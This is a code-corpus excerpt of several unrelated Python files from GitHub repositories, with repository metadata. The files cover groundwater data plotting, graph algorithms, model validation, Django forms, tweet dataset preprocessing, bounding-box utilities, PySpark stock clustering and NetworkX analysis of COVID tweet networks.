key2=status[0]\n phrase=\"\"\n for a in status[1:]:\n phrase=phrase+\" \"+a\n codesDict[key1][key2]=phrase[1:]\n\n#print(codesDict[\"lev_acy_cd\"])\n\n#print(\"###########################################\")\n\nf2 = open('data/gwsites.txt','r')\nlines2 = f2.readlines()\n\nnames=lines2[12:24]\ntitles=lines2[32]\nsitesRaw=lines2[34:]\n\n\n\n#rint(titles)\n\nsiteDict={}\n\nfor name in names:\n key=name.split()[1]\n phrase=\"\"\n for a in name.split()[3:]:\n phrase=phrase+\" \"+a\n siteDict[key]=phrase[1:]\n\nsites={}\n\nfor site in sitesRaw:\n sp=site.split(\"\\t\")\n id=sp[0]\n sites[id]={\"data\":{}}\n for i in range(12):\n key=titles.split()[i+1]\n if key!=\"coord_acy_cd'\" and key!=\"dec_coord_datum_cd\" and key!=\"alt_datum_cd\" and key!=\"alt_acy_va\":\n if key==\"gw_count_nu\":\n sites[id][key]=sp[i+1][:-1]\n else:\n sites[id][key]=sp[i+1]\n if int(sites[id][\"gw_count_nu\"])>2000:\n print(id)\n \n\n\n#print(sites['331923114513301'])\n\ndates=[]\ncount=[]\nidn='360349115100001'\nfor pt in data:\n dat=pt[:-2].split(\"\\t\")\n if dat[1]==idn:\n dates.append(datetime.fromisoformat(dat[3]).timestamp()/31536000+1970)\n count.append(-1*float(dat[6]))\ny = gaussian_filter1d(count, sigma=2)\n#plt.plot(dates,y)\n#plt.show()\n\ndef isNumber(s):\n try:\n float(s) # for int, long and float\n except ValueError:\n return False\n return True\n\n\nx2=[]\ny2=[]\n\nfor site in sitesRaw:\n sp=site.split(\"\\t\")\n id=sp[0]\n \n lon=sites[id][\"dec_lat_va\"]\n lat=sites[id][\"dec_long_va\"]\n \n if isNumber(lon) and isNumber(lat) and int(sites[id][\"gw_count_nu\"]):\n lon=float(lon)\n lat=float(lat)\n \n x2.append(lat)\n y2.append(lon)\n \n#plt.scatter(y2,x2)#,alpha=0.1)\n#plt.show()\n\n#985,722,613\ntimeData=np.zeros((90,722,613))\nref=np.zeros((90,722,613))\n\nfor pt in data:\n dat=pt[:-2].split(\"\\t\")\n id=dat[1]\n \n #print(dat[1]==idn)\n if isNumber(dat[6]):\n val=float(dat[6])\n if len(dat[3])==7:\n dat[3]+=\"-01\"\n if len(dat[3])==4:\n dat[3]+=\"-01-01\"\n sites[id][\"data\"][dat[3]]=val\n #month=(int(dat[3][:4])-1938)*12+int(dat[3][5:7])\n year=int(dat[3][:4])-1938\n lon=sites[id][\"dec_lat_va\"]\n lat=sites[id][\"dec_long_va\"]\n if isNumber(lon) and isNumber(lat) and int(sites[id][\"gw_count_nu\"]):\n lon=(float(lon)-34.8)*100\n lat=(float(lat)+120.17)*100\n num=ref[year,int(lon),int(lat)]\n timeData[year,int(lon),int(lat)]=(num*timeData[year,int(lon),int(lat)]+val)/(num+1)\n ref[year,int(lon),int(lat)]+=1\n\nfig = plt.figure()\nax = plt.axes() \n\nplt.title('Water Visualization')\n\n#z = timeData[50,:,:]\n#z = np.flip(np.flip(gaussian_filter(timeData[500,:,:],sigma=6)),1)\n#cont = plt.imshow(z)\n\nco=0\nfor i in range(timeData.shape[1]):\n for j in range(timeData.shape[2]):\n con=0\n for k in range(timeData.shape[0]):\n if timeData[k,i,j]!=0:\n con+=1\n if con>3:\n co+=1\n print(i,end='\\r')\nprint(co)\n\n##baseline\n#for i in range(timeData.size)\n\n\n\nplt.show()\n\n# Animation function\n#def animate(i): \n# z = gaussian_filter(timeData[i,:,:],sigma=3)\n# #z = data[:,:,i]\n# cont = plt.imshow(z)\n# \n# print(i,end='\\r')\n# return cont \n\n#anim = FuncAnimation(fig, animate, frames=timeData.shape[0])\n#anim.save('basic_animation.gif', writer=PillowWriter(fps=24))\n\n#plt.show()\n\n\n\n#np.save('timeData',timeData)\n\n#a=[]\n#dataPts=np.array([2,3,4])\n#for k in range(938):\n# count=0 \n# for i in range(720):\n# for j in range(613):\n# if 0!=timeData[k,i,j]:\n# count+=1\n #np.append(dataPts,[k/12+1938,timeData[k,i,j]])\n# a.append(count)\n# if k%10==0:\n# print(k/10, end='\\r')\n#plt.plot(gaussian_filter1d(a, sigma=3))\n#plt.show() \n \n\n\n\n#for site in sitesRaw:\n# sp=site.split(\"\\t\")\n# idn=sp[0]\n# arr=np.array([])\n# if int(sites[idn][\"gw_count_nu\"])>200: \n \n # np.append(arr,[datetime.fromisoformat(dat[3]).timestamp()/31536000+1970,float(dat[6])])\n \n #y = gaussian_filter1d(lev, sigma=2)\n #plt.plot(dates,y)\n #plt.show()\n\n\n#print(sites['393309118515901']) \n\n\ndef isNumber(s):\n try:\n float(s) # for int, long and float\n except ValueError:\n try:\n complex(s) # for complex\n except ValueError:\n return False\n\n return True","repo_name":"benckeller/watervision","sub_path":"dataProcessing/waterVis.py","file_name":"waterVis.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6401847931","text":"from math import inf\n\ndef Prim(G,s):\n N = len(G)\n G.sort()\n maxx = max(max(G))\n n = maxx +1\n W = [inf for _ in range(n)]\n Parent = [None for _ in range(n)]\n Przetworzone = [False for _ in range(n)]\n W[s]=0\n Przetworzone[s] = True\n\n for i in range(len(Przetworzone)):\n for v in range(N):\n if G[v][0] == s:\n break\n cp = v\n while v < N and G[v][0] == s:\n w = v\n while w < N and G[w][0]==s:\n if Przetworzone[G[w][1]] == False and W[G[w][1]] > G[w][2]:\n W[G[w][1]]=G[w][2]\n w+=1\n v+=1\n minn = inf\n while cp < N and G[cp][0] == s:\n if Przetworzone[G[cp][1]] == False and W[G[cp][1]] tuple[float, Any]:\n \"\"\"\n Full validation process of a model for dataset with a ground truth, with custom splitting method,\n returns the percentage predicted correctly and a confusion matrix\n :param label_encoder: encoder for labels\n :param labels: list of labels\n :param default_activity: int representing encoded default activity\n :param data: pd.Dataframe with 'Start_Time', 'End_Time', 'Sensor' columns\n :param ground_truth: pd.Dataframe with 'Start_Time', 'End_Time', 'Activity' columns\n :param model: implementation of abstract commons.Model class\n :param model_hyperparams: a dictionary of hyperparams for the model train function\n :param window_length_seconds: length of window for windowing of data\n :param window_slide_seconds: how much time inbetween each window in seconds\n :param split_method: any method that takes a list and returns a train, test split\n :return the total average and a confusion matrix for the model\n \"\"\"\n # Window the data\n windows = split_into_windows(data, ground_truth, default_activity, window_length_seconds,\n window_slide_seconds)\n # Split the windows into train and test\n if split_method is not None:\n train, test = split_method(windows)\n else: # Use default 60/40 split\n random.shuffle(windows)\n split_index = int(len(windows) * 0.6)\n\n train = windows[:split_index]\n test = windows[split_index:]\n\n return validate(train, test, model, labels, label_encoder, model_hyperparams)\n\n\ndef validate(train: list[tuple[pd.DataFrame, int, pd.Timestamp, pd.Timestamp]],\n test: list[tuple[pd.DataFrame, int, pd.Timestamp, pd.Timestamp]],\n model: Model, labels: list[str], label_encoder: StringLabelEncoder,\n model_hyperparams: dict | None = None) -> tuple[float, Any]:\n \"\"\"\n Validates a given model using a train and test list of windows, returns the percentage predicted\n correctly and a confusion matrix\n :param label_encoder: encoder for labels\n :param labels: list of labels\n :param train: tuple from window_splitter\n :param test: tuple from window_splitter\n :param model: implementation of abstract commons.Model class\n :param model_hyperparams: a dictionary of hyperparams for the model train function\n :return the total average and a confusion matrix for the model\n \"\"\"\n # Train the model\n if model_hyperparams is None:\n model_hyperparams = {}\n model.train(train, **model_hyperparams)\n\n # Predict activities for test data using model\n score = 0\n y_pred = []\n y_true = []\n for window in test:\n truth_value = window[1]\n prediction = model.predict(window[0]) # Assumes output of predict will be a string activity\n y_pred.append(prediction)\n y_true.append(truth_value)\n # print('Predicted: ' + str(prediction))\n # print('for actual: ' + str(truth_value))\n if truth_value == prediction:\n score += 1\n average = score / len(test)\n # labels = ['Sleeping', 'Meal_Preparation', 'Kitchen_Usage', 'Bathroom_Usage', 'Idle', 'Relax',\n # 'Outside']\n # print(len(y_true))\n dy_true = [label_encoder.decode_label(y) for y in y_true]\n dy_pred = [label_encoder.decode_label(y) for y in y_pred]\n # print(len(y_pred))\n cm = confusion_matrix(dy_true, dy_pred, labels=labels, normalize='true')\n return average, cm\n","repo_name":"R3c5/Multi-Modal-Edge-AI","sub_path":"multi_modal_edge_ai/models/adl_inference/validating/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32533740121","text":"print(\"Bienvenidos a AEROMATIC\")\n\ni = 0\ncontinuar = True\n\nwhile continuar:\n print(\"CUADRADO\", i)\n l = int(input(\"Lado? \"))\n\n if l == -1:\n continuar = False\n else:\n a = l*l\n print(\"Area\", a)\n i += 1\n\nprint(\"Gracias por usar AEROMATIC\")\n\n\n","repo_name":"jorgedg6/material-computacion","sub_path":"INTRO A PYTHON/Codigos/4. Iteraciones/areomatic32.py","file_name":"areomatic32.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5816452906","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom . import models\nclass comment_form(forms.Form):\n comment=forms.CharField(required = True,max_length=400,widget=forms.Textarea\n (attrs={'class':'form-control ',\n\t\t\t\t 'id':'exampleFormControlTextarea1','rows':'1'}))\n\nclass note_form(forms.Form):\n note=forms.CharField(required = False,max_length=400,widget=forms.Textarea\n (attrs={'class':'form-control ',\n 'id':'exampleFormControlTextarea2','rows':'10'}))\n\n\nclass recipe_form(forms.ModelForm):\n class Meta():\n model = models.recipe\n fields = ('cuisine_name','name','ingredients','method','time','image')\n #exclude = ('cuisine_name')\n #comment=forms.CharField(max_length=400)\nclass recipe_edit_form(forms.ModelForm):\n class Meta():\n model = models.recipe\n fields = ('cuisine_name','name','ingredients','method','time')\n #exclude = ('cuisine_name')\n #comment=forms.CharField(max_length=400)\nclass search(forms.Form):\n txtSearch=forms.CharField(max_length=400)\n","repo_name":"Mayank-Bhatt-450/cookbook","sub_path":"recipes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7804744880","text":"import json\nimport os\nimport csv\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nimport preprocessor as p\n\nwith open('rumoureval-2019-training-data/train-key.json') as json_file:\n train_key = json.load(json_file)\n\nwith open('rumoureval-2019-training-data/dev-key.json') as json_file:\n dev_key = json.load(json_file)\n\npath = \"rumoureval-2019-training-data/twitter-english\"\nmain_dir = os.listdir(path)\n\n\nlst_a = [\"support\", \"query\", \"deny\", \"comment\"]\nlst_b = [\"true\", \"false\", \"unverified\"]\n\nwith open('twitter_training_dataset.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n header = ['type', 'id', 'text', 'favorite_count', 'retweet_count', 'label_a', 'label_b']\n writer.writerow(header)\n\n for dirs in main_dir:\n print(10 * \"- - \", dirs, 10 * \"- - \")\n dir = os.path.join(path, dirs)\n sub_dir = os.listdir(dir)\n for source_id in sub_dir:\n source_tweet = os.path.join(dir, source_id, \"source-tweet\", source_id + \".json\")\n with open(source_tweet) as json_file:\n data = json.load(json_file)\n\n task_a = \"\"\n task_b = \"\"\n\n for i in train_key['subtaskaenglish']:\n if i==str(source_id):\n task_a = lst_a.index(train_key['subtaskaenglish'][i])\n\n for i in train_key['subtaskbenglish']:\n if i==str(source_id):\n task_b = lst_b.index(train_key['subtaskbenglish'][i])\n\n if task_a==\"\":\n for i in dev_key['subtaskaenglish']:\n if i == str(source_id):\n task_a = lst_a.index(dev_key['subtaskaenglish'][i])\n\n for i in dev_key['subtaskbenglish']:\n if i == str(source_id):\n task_b = lst_b.index(dev_key['subtaskbenglish'][i])\n\n row = [\"source\", str(data['id']), p.clean(str(data['text'])), data['favorite_count'], data['retweet_count'], task_a, task_b]\n writer.writerow(row)\n\n replies = os.path.join(dir, source_id, \"replies\")\n replies_dir = os.listdir(replies)\n \n for reply in replies_dir:\n tweet = os.path.join(replies, reply)\n reply_id = str(reply)[:-5]\n\n task_a = \"\"\n task_b = \"\"\n\n for i in train_key['subtaskaenglish']:\n if i==str(reply_id):\n task_a = lst_a.index(train_key['subtaskaenglish'][i])\n\n if task_a==\"\":\n for i in dev_key['subtaskaenglish']:\n if i == str(reply_id):\n task_a = lst_a.index(dev_key['subtaskaenglish'][i])\n\n with open(tweet) as json_file:\n data = json.load(json_file)\n row = [\"reply\", str(data['id']), p.clean(str(data['text'])), data['favorite_count'], data['retweet_count'], task_a, task_b]\n writer.writerow(row)\n","repo_name":"rajveerbeerda/RumourEval-2019","sub_path":"manipulating_dataset/twitter_training.py","file_name":"twitter_training.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"17300756835","text":"\"\"\"\nThis file contains basic functionality for the handling of bounding boxes.\n\"\"\"\nimport numpy as np\n\nfrom skimage.morphology import convex_hull_image\n\n\ndef bbox_center(bbox):\n \"\"\" Center of bounding box.\n\n Parameters:\n -----------\n bbox: tuple (y0, x0, h, w)\n\n Return:\n -------\n center: tuple (y, x)\n \"\"\"\n y, x, h, w = bbox\n return int(y + h/2), int(x + w/2)\n\n\ndef coords_to_bbox(coords):\n \"\"\" Bounding box of coords.\n\n Parameters:\n -----------\n coords: numpy array (n, 2)\n Coordinates.\n\n Return:\n -------\n bbox: tuple (y0, x0, h, w)\n \"\"\"\n min_y, min_x, max_y, max_x = coords[0].min(), coords[1].min(), coords[0].max(), coords[1].max()\n return min_y, min_x, max_y - min_y, max_x - min_x\n\n\ndef mask_to_bbox(mask, label=None):\n \"\"\" Bounding box of pixel mask.\n\n Parameters:\n -----------\n mask: numpy array\n Binary mask or label image.\n label: int (optional)\n Label if mask is label image.\n\n Return:\n -------\n bbox: tuple (y0, x0, h, w)\n \"\"\"\n mask = mask if label is None else mask == label\n coords = np.where(mask)\n return coords_to_bbox(coords)\n\n\ndef coords_to_chull(coords, shape):\n \"\"\" Convex hull of coords.\n\n Parameters:\n -----------\n coords: numpy array (n, 2)\n Coordinates.\n shape: array like (2,)\n Shape of image.\n\n Return:\n -------\n matrix: numpy array with input shape\n \"\"\"\n matrix = np.zeros(shape[:2], dtype='uint8')\n matrix[coords[:, 0], coords[:, 1]] = 1\n return convex_hull_image(matrix)\n\n\ndef iou(bboxa, bboxb):\n \"\"\" Intersection over union of bounding boxes bboxa and bboxb.\n\n Parameters:\n -----------\n bboxa: tuple (y0, x0, h, w)\n bboxb: tuple (y0, x0, h, w)\n\n Return:\n -------\n iou: float\n area(bboxa n bboxb)/area(bboxa u bboxb)\n \"\"\"\n yamin, xamin, ha, wa = bboxa\n ybmin, xbmin, hb, wb = bboxb\n yamax, xamax = yamin+ha, xamin+wa\n ybmax, xbmax = ybmin+hb, xbmin+wb\n xs, ys = max(xamin, xbmin), max(yamin, ybmin)\n xe, ye = min(xamax, xbmax), min(yamax, ybmax)\n areai = (xe-xs)*(ye-ys) if xe > xs and ye > ys else 0.0\n areau = ha*wa + hb*wb - areai\n return float(areai)/areau\n\n\ndef has_intersection(bboxa, bboxb):\n \"\"\" Returns True if bboxa has an intersection with bboxb.\n\n Parameters:\n -----------\n bboxa: tuple (y0, x0, h, w)\n bboxb: tuple (y0, x0, h, w)\n\n Return:\n -------\n iou: bool\n \"\"\"\n yamin, xamin, ha, wa = bboxa\n ybmin, xbmin, hb, wb = bboxb\n yamax, xamax = yamin+ha, xamin+wa\n ybmax, xbmax = ybmin+hb, xbmin+wb\n xs, ys = max(xamin, xbmin), max(yamin, ybmin)\n xe, ye = min(xamax, xbmax), min(yamax, ybmax)\n return xe > xs and ye > ys\n\n\ndef evaluate_object_category(ground_truth, prediction, min_iou=0.5):\n \"\"\"\n\n Parameters:\n -----------\n ground_truth: list of tuples (y0, x0, h, w) (bounding boxes)\n prediction: list of tuples (y0, x0, h, w) (bounding boxes)\n min_iou: float\n Intersection over union must be greater than min_iou.\n\n Return:\n -------\n (precision, recall, tp, fp) : float, float, int, int\n \"\"\"\n # edge cases\n if len(prediction) == 0 and len(ground_truth) > 0:\n return 0.0, 0.0, 0.0, 0.0\n if len(prediction) == 0 and len(ground_truth) == 0:\n return 1.0, 1.0, 0.0, 0.0\n if len(prediction) > 0 and len(ground_truth) == 0:\n return 0.0, 1.0, 0.0, len(prediction)\n\n # predictions that intersect with multiple objects are associated by greatest iou\n ious = [[iou(gt, p) for gt in ground_truth] for p in prediction]\n association = [max(enumerate(lst), key=lambda x:x[1]) for lst in ious] # generates (key, value) pairs\n\n # only predictions with iou > min_iou are associated\n association = [a if a[1] > min_iou else (-1, a[1]) for a in association]\n\n # only prediction with greatest iou is associated with the ground truth\n for gt in range(len(ground_truth)):\n indices = [(i, a[1]) for i, a in enumerate(association) if a[0] == gt]\n if len(indices) > 1:\n indices.pop(max(enumerate(indices), key=lambda x: x[1][1])[0])\n for elem in indices:\n association[elem[0]] = (-1, association[elem[0]][1])\n\n # return precision, recall, tp, fp\n tp = sum([1 for a in association if a[0] >= 0])\n return float(tp)/len(prediction), float(tp)/len(ground_truth), tp, len(prediction) - tp\n","repo_name":"wllhf/img_toolbox","sub_path":"bbox.py","file_name":"bbox.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"69962323575","text":"from upload_to_gcp import Upload_To_GCP\nfrom read_data_source import Read_In_Data_Source\n\nfrom pyspark.sql import SparkSession, functions as F\nfrom pyspark.sql.functions import avg, variance, col\nfrom pyspark.sql.window import Window\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler\nfrom pyspark.ml.clustering import KMeans\nfrom pyspark.ml.evaluation import ClusteringEvaluator\nfrom pyspark.ml.functions import vector_to_array\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime\nimport re\n\n\nclass K_Means_Stocks_Clustering:\n def __init__(self):\n self.gcp_functions = Upload_To_GCP()\n self.read_in_data_source = Read_In_Data_Source()\n self.stock_df_clean = self.read_in_data_source.read_in_data_data_cleaning()\n\n\n def daily_returns_avg_var_cluster(self):\n self.k_means_log = \"\"\n number_of_clusters = 4\n\n k_means_set = self.stock_df_clean.select('Symbol', 'Date', 'daily_return', 'GICS Sector')\n cluster_set = k_means_set.groupBy('Symbol')\\\n .agg(F.round(avg('daily_return'), 4).alias('avg(daily_return)'), F.round(variance('daily_return'), 4).alias('variance(daily_return)'))\n\n assemble=VectorAssembler(inputCols=['avg(daily_return)', 'variance(daily_return)'], outputCol='features')\n assembled_data=assemble.transform(cluster_set)\n\n scale=StandardScaler(inputCol='features',outputCol='standardized')\n data_scale=scale.fit(assembled_data)\n data_scale_output=data_scale.transform(assembled_data)\n\n\n evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='standardized', \\\n metricName='silhouette', distanceMeasure='squaredEuclidean')\n \n KMeans_algo=KMeans(featuresCol='standardized', k=number_of_clusters)\n KMeans_fit=KMeans_algo.fit(data_scale_output)\n output=KMeans_fit.transform(data_scale_output)\n score=evaluator.evaluate(output)\n\n self.k_means_log += f\"{datetime.now()}: \\nThe Number of Clusters is: {number_of_clusters}\\n\"\n self.k_means_log += f\"\\n{datetime.now()}: \\nThe Silhouette score is: {score}\\n\"\n self.gcp_functions.upload_string_message(bucket_name=\"stock-sp500\", contents=self.k_means_log, destination_blob_name=\"Clustering/k_means_log.txt\")\n \n cluster_df = output.withColumn(\"xs\", vector_to_array(\"standardized\")) \\\n .select(['Symbol','avg(daily_return)', 'variance(daily_return)', 'prediction'] + [col(\"xs\")[i] for i in range(2)])\n\n\n final_cluster_df = cluster_df.join(k_means_set, 'Symbol', how = 'left').\\\n select('Symbol', 'avg(daily_return)', 'variance(daily_return)', 'prediction','xs[0]','xs[1]', 'GICS Sector').\\\n distinct().toPandas()\n\n final_cluster_df.to_csv('gs://stock-sp500/Clustering/k_means_clustered_data.csv', index = False)\n\n final_cluster_df['prediction'] = final_cluster_df['prediction'].astype('str')\n final_cluster_df.rename({\"xs[0]\": \"daily_return_standardized\", \"xs[1]\": \"volume_standardized\"}, axis = \"columns\", inplace = True)\n\n new_final_cluster_df = final_cluster_df[final_cluster_df[\"variance(daily_return)\"]<=10]\n\n\n # Counts per Cluster\n counts_per_cluster = sns.countplot(x=\"prediction\", data=final_cluster_df, order=['0','1','2','3'])\n counts_per_cluster.bar_label(counts_per_cluster.containers[0])\n plt.title('Counts by Cluster')\n plt.savefig(\"counts_per_cluster.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"counts_per_cluster.png\", \n destination_blob_name=\"Clustering/counts_per_cluster.png\")\n\n\n fig, axs = plt.subplots(ncols=2, figsize=(15,5))\n all_data = sns.scatterplot(data=final_cluster_df, \n x=\"avg(daily_return)\", \n y=\"variance(daily_return)\", \n hue=\"prediction\",\n alpha=0.75,\n hue_order = ['0', '1', '2', '3'], ax=axs[0], legend = False)\n\n zoomed_in = sns.scatterplot(data=new_final_cluster_df, \n x=\"avg(daily_return)\", \n y=\"variance(daily_return)\", \n hue=\"prediction\",\n alpha=0.75,\n hue_order = ['0', '1', '2', '3'], ax=axs[1])\n axs[1].set_title('Zoomed In: K-Means Clusters')\n axs[0].set_title('All Data: K-Means Clusters')\n zoomed_in.legend(loc='center left', bbox_to_anchor=(1, 0.5), ncol=1, title = \"Cluster Group\")\n fig.tight_layout()\n plt.savefig(\"k_means_cluster.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"k_means_cluster.png\", \n destination_blob_name=\"Clustering/k_means_cluster.png\")\n\n \n # Average Daily Returns Histogram\n fig, axs = plt.subplots(ncols=2, figsize=(15,5))\n all_data_hist = sns.histplot(data=final_cluster_df, x=\"avg(daily_return)\", kde=True, ax=axs[0])\n zoomed_data_hist = sns.histplot(data=new_final_cluster_df, x=\"avg(daily_return)\", kde=True, ax=axs[1])\n axs[0].set_title('Average Daily Returns: All Data')\n axs[1].set_title('Average Daily Returns: Zoomed In')\n fig.tight_layout()\n plt.savefig(\"avg_dr_hist.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"avg_dr_hist.png\", \n destination_blob_name=\"Clustering/avg_dr_hist.png\")\n\n\n # Variance Daily Returns Histogram\n fig, axs = plt.subplots(ncols=2, figsize=(15,5))\n all_data_hist = sns.histplot(data=final_cluster_df, x=\"variance(daily_return)\", kde=True, ax=axs[0])\n zoomed_data_hist = sns.histplot(data=new_final_cluster_df, x=\"variance(daily_return)\", kde=True, ax=axs[1])\n axs[0].set_title('Variance Daily Returns: All Data')\n axs[1].set_title('Variance Daily Returns: Zoomed In')\n fig.tight_layout()\n plt.savefig(\"var_dr_hist.png\")\n\n # Uploading this figure up to GCP bucket\n self.gcp_functions.upload_filename(bucket_name=\"stock-sp500\", \n file_name= \"var_dr_hist.png\", \n destination_blob_name=\"Clustering/var_dr_hist.png\")","repo_name":"carlosmonsivais123/PySpark-SP500-Portfolio-Optimization","sub_path":"PySpark_Clustering/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":6740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6448627115","text":"import string\nimport os\nimport time\n\n\ncoords = [[7,1], [5,2], [4,4], [2,5], [4,6], [3,8]]\n\ndef set_poles ():\n table = [['0']*9 for i in range(9)]\n table[-1] = [0] + list(string.ascii_lowercase[:8])\n for i in range(8):\n table[i][0] = 8-i\n return table\n\ndef print_table(table):\n for i in table:\n print(i)\n\ndef main():\n global coords\n table = set_poles()\n table[coords[0][0]][coords[0][1]] = '1'\n print_table(table)\n\nwhile len(coords) > 0:\n os.system('clear')\n main()\n coords = coords[1::]\n time.sleep(1)","repo_name":"HardreaM/euraz","sub_path":"Andrey Zybkov/f21.py","file_name":"f21.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33033356337","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport community\nimport collections\nimport numpy as np\nimport scipy as sp\nfrom collections import Counter\nfrom operator import itemgetter\nimport scipy.special\n\n# יבוא דאטא ראשוני\nData = open('ClaimRealCOVID-19_tweets_replies_5.csv', \"r\")\nnext(Data, None) # skip the first line in the input file\nGraphtype = nx.DiGraph()\nG = nx.parse_edgelist(Data, delimiter=',', create_using=Graphtype, nodetype=int, data=(('weight', float),))\noriginal_nodes = list(G.nodes)\noriginal_edges = list(G.edges)\nprint(\"number of nodes \", len(original_nodes))\nprint(\"number of edges \", len(original_edges))\n# print(\"original_nodes\", original_nodes)\n# print(\"original_edges\", original_edges)\n# ציור גרף מקורי\ncolor_map = []\nfor node in G:\n if node < 1000:\n color_map.append('blue') # news\n elif node < 1000000:\n color_map.append('red') # articles\n else:\n color_map.append('#4a86e8') # users\n# nx.draw(G, node_color=color_map, with_labels=False)\n# #pos = nx.spring_layout(G)\n# plt.show()\n\n# רכיבי קשירות\n# print(\"num of strongly cc \", nx.number_strongly_connected_components(G))\n# print(\"num of weakly cc \", nx.number_weakly_connected_components(G))\n# print(\"all the components\")\nb = sorted(nx.weakly_connected_components(G), key=len, reverse=True)\n# print(\"b\", len(b))\n\n# ציור רכיב הקשירות הגדול ביותר\n# largest = len(b[3])\n# print(\"largest connected components \", largest)\nNH = G.subgraph(b[0])\nnodes = list(NH.nodes)\nedges = list(NH.edges)\nprint(\"***********************\")\n# print(\"diameter\",nx.diameter(NH.to_undirected()))\n# print(\"average\",nx.average_shortest_path_length(NH))\n# print(\"largest connected components nodes\", len(nodes))\n# print(\"largest connected components edges\", len(edges))\ncolor_map = []\nfor node in NH:\n if node < 1000:\n color_map.append('blue') # news\n elif node < 1000000:\n color_map.append('red') # articles\n else:\n color_map.append('#4a86e8') # users\n# nx.draw(NH, node_color=color_map, with_labels=False)\n# plt.show()\n\n######## degree histogram ###################33\n\n# degree_sequence = sorted([d for n, d in G.degree()], reverse=True) # degree sequence\n# print(\"degree\",degree_sequence)\n# degreeCount = collections.Counter(degree_sequence)\n# deg, cnt = zip(*degreeCount.items())\n# fig, ax = plt.subplots()\n# plt.bar(deg, cnt, width=0.80, color=\"b\")\n# plt.title(\"Degree Histogram\")\n# plt.ylabel(\"Count\")\n# plt.yscale('log')\n# plt.xlabel(\"Degree\")\n# plt.xscale('log')\n# plt.yscale('log')\n# plt.show()\n\n# התפלגות דרגות\n# degree_sequence = sorted([d for n, d in NH.degree()], reverse=True) # degree sequence\n# print(\"degree\", degree_sequence)\n# degreeCount = collections.Counter(degree_sequence)\n# deg, cnt = zip(*degreeCount.items())\n# print(\"deg\",deg)\n# p = []\n# for x in cnt:\n# p.append(x / len(nodes))\n# print(\"cnt\", cnt)\n# print(\"probabily\", p)\n# fig, ax = plt.subplots()\n# plt.bar(deg, p, width=1, color=\"b\",edgecolor='black',)\n# plt.title(\"Degree Histogram\")\n# plt.ylabel(\"probability\")\n# plt.xlabel(\"Degree\")\n# plt.xscale('log')\n# plt.yscale('log')\n# # plt.xlim([0, 4000])\n# # plt.ylim([0, 1])\n# plt.show()\n\n# מדדי מרכזיות\n\n# print(\"degree centrality\", nx.degree_centrality(G))\n# print(nx.in_degree_centrality(G))\n# print(nx.out_degree_centrality(G))\n# print(\"betweenness\", nx.betweenness_centrality(G, k=100, normalized=True, weight=None, endpoints=False, seed=None))\n# print(\"pagerank\", nx.pagerank(G, alpha=0.8))\n# print(\"closeness\", nx.closeness_centrality(G))\n\n# degree_centrality=nx.degree_centrality(G)\n# a={k: v for k, v in sorted(degree_centrality.items(), key=lambda item: item[1], reverse=True)}\n# z=[]\n# for i in a.values():\n# z.append(i)\n#\n# Count = collections.Counter(z)\n# deg, cnt = zip(*Count.items())\n# print(\"deg\",deg)\n# p = []\n# for x in cnt:\n# p.append(x / len(nodes))\n# # print(\"cnt\", cnt)\n# # print(\"probabily\", p)\n# fig, ax = plt.subplots()\n# plt.bar(deg, cnt, width=1, color=\"b\",edgecolor='black',)\n# plt.title(\"Degree Histogram\")\n# plt.ylabel(\"cnt\")\n# plt.xlabel(\"Degree\")\n# plt.xlim([0,2])\n# plt.show()\n\n\n# plt.hist(deg, bins=np.logspace(np.log10(1), np.log10(1000), 100), density=True, edgecolor='black')\n# plt.gca().set_xscale(\"log\")\n# plt.gca().set_yscale(\"log\")\n# plt.show()\n# degree_centrality=nx.degree_centrality(G)\n# node_sizes=[]\n# for x in degree_centrality.values():\n# node_sizes.append(x*1000)\n#\n# in_degree=nx.in_degree_centrality(G)\n# node_sizes=[]\n# for x in in_degree.values():\n# node_sizes.append(x*1000)\n\n# out_degree=nx.out_degree_centrality(G)\n# node_sizes=[]\n# for x in out_degree.values():\n# node_sizes.append(x*1000)\n\n# betweenness=nx.betweenness_centrality(G, k=None, normalized=True, weight=None, endpoints=False, seed=None)\n# node_sizes=[]\n# for x in betweenness.values():\n# node_sizes.append(x*1000)\n\n# page_rank= nx.pagerank(G, alpha=0.8)\n# node_sizes=[]\n# for x in page_rank.values():\n# node_sizes.append(x*1000)\n\n\n# closeness=nx.closeness_centrality(G)\n# node_sizes=[]\n# for x in closeness.values():\n# node_sizes.append(x*1000)\n#\n\n# nx.draw(G, node_color=color_map,node_size=node_sizes, with_labels=False)\n# plt.show()\n\n\n# ניסוי יצירת גרף רק משתמשים 1\nDG = 